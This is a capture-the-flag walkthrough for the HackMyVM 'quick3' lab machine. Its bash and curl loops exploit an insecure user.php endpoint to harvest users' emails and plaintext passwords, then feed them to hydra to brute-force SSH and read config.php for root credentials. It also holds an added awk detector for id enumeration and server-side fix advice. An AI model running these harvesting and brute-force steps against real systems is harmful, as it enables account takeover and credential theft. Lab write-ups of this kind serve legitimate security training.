quick3 - eMVee
Title: quick3
Author: eMVee
Release date: 2024-02-19
Download from: HackMyVM
Level: Easy
System: linux
You’ll learn: Bash scripting
01. Register new user
export IP=172.16.1.127
curl -d "name=newuser&email=newmail@newmail.com&password=password&register=Register" http://$IP/customer/index.php
# Registration successful
02. Login and get a cookie
curl -v -d 'email=newmail@newmail.com&password=password&login=Login' 'http://172.16.1.127/customer/login.php'
# * Trying 172.16.1.127:80...
# * Connected to 172.16.1.127 (172.16.1.127) port 80
# > POST /customer/login.php HTTP/1.1
# > Host: 172.16.1.127
# > User-Agent: curl/8.5.0
# > Accept: */*
# > Content-Length: 55
# > Content-Type: application/x-www-form-urlencoded
# >
# < HTTP/1.1 302 Found
# < Date: Tue, 20 Feb 2024 00:06:22 GMT
# < Server: Apache/2.4.52 (Ubuntu)
# < Set-Cookie: PHPSESSID=hab58kcfs74fgp9vtv78i92de5; path=/
# < Expires: Thu, 19 Nov 1981 08:52:00 GMT
# < Cache-Control: no-store, no-cache, must-revalidate
# < Pragma: no-cache
# < location: dashboard.php
# < Content-Length: 0
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host 172.16.1.127 left intact
03. Create a list of emails
cookie="PHPSESSID=hab58kcfs74fgp9vtv78i92de5"
pattern1="fa-envelope-o"
pattern2=": .*@*<"
pattern3=' :<'
for i in {1..28}; do
curl -s -b "$cookie" "http://$IP/customer/user.php?id=$i" | grep "$pattern1" | grep -o "$pattern2" | tr -d "$pattern3"
done > emails.txt
04. Create a list of passwords
cookie="PHPSESSID=hab58kcfs74fgp9vtv78i92de5"
pattern1="oldpassword\" value="
pattern2="value=\".*\""
pattern3='s/value=//g; s/"//g'
for i in {1..28}; do
curl -s -b "$cookie" "http://$IP/customer/user.php?id=$i" | grep "$pattern1" | grep -o "$pattern2" | sed "$pattern3"
done > passwords.txt
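Steps 03 and 04 work because /customer/user.php returns any user's record to any logged-in session, which leaves a run of sequential id values from one client in the web server log. The script below is an added example, not part of the original write-up: it flags that pattern in an Apache access log, and the log lines, client addresses and threshold are constructed assumptions.

```bash
#!/bin/sh
# Added example (defensive): spot one client walking many ids on user.php.

# Constructed access-log lines in Apache common log format (not from the page).
sample_log() {
  i=1
  while [ "$i" -le 28 ]; do   # one client requesting ids 1..28 in sequence
    printf '192.0.2.10 - - [20/Feb/2024:00:07:%02d +0000] "GET /customer/user.php?id=%d HTTP/1.1" 200 5120\n' "$i" "$i"
    i=$((i + 1))
  done
  for s in 1 2 3; do          # another client reloading only its own profile
    printf '192.0.2.20 - - [20/Feb/2024:00:08:%02d +0000] "GET /customer/user.php?id=5 HTTP/1.1" 200 5120\n' "$s"
  done
  printf '192.0.2.30 - - [20/Feb/2024:00:09:00 +0000] "GET /customer/dashboard.php HTTP/1.1" 200 2048\n'
}

# detect_id_enumeration MIN [FILE]
# Prints "client distinct_ids" for every client that requested at least MIN
# different id values on /customer/user.php. Reads stdin when FILE is omitted.
detect_id_enumeration() {
  awk -v min="$1" '
    # $1 = client address, $7 = request target in common/combined log format
    $7 ~ /^\/customer\/user\.php\?/ {
      n = split($7, part, /[?&]/)
      for (k = 2; k <= n; k++) {
        if (part[k] ~ /^id=[0-9]+$/) {
          id = substr(part[k], 4)
          if (!(($1, id) in seen)) { seen[$1, id] = 1; distinct[$1]++ }
        }
      }
    }
    END {
      for (c in distinct)
        if (distinct[c] >= min) print c, distinct[c]
    }
  ' "${2:--}" | sort
}

# Threshold of 10 distinct ids is an assumption; tune it to normal usage.
sample_log | detect_id_enumeration 10
```

Detection only narrows the window. The fix is server-side: user.php should serve a record only when the requested id matches the session's own user, and should not render the stored password into the oldpassword field.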
05. Create a list of the type user:pass
paste emails.txt passwords.txt | sed 's/@.*hmv/:/' | tr -d ' \t' > user_pass.txt
awk -F'[.:]' '{print $1":"$NF}' user_pass.txt > user_pass2.txt
06. Find the password for the SSH user
hydra -V -C user_pass2.txt ssh://$IP
07. Find the password for the root user
bash
cat /var/www/html/customer/config.php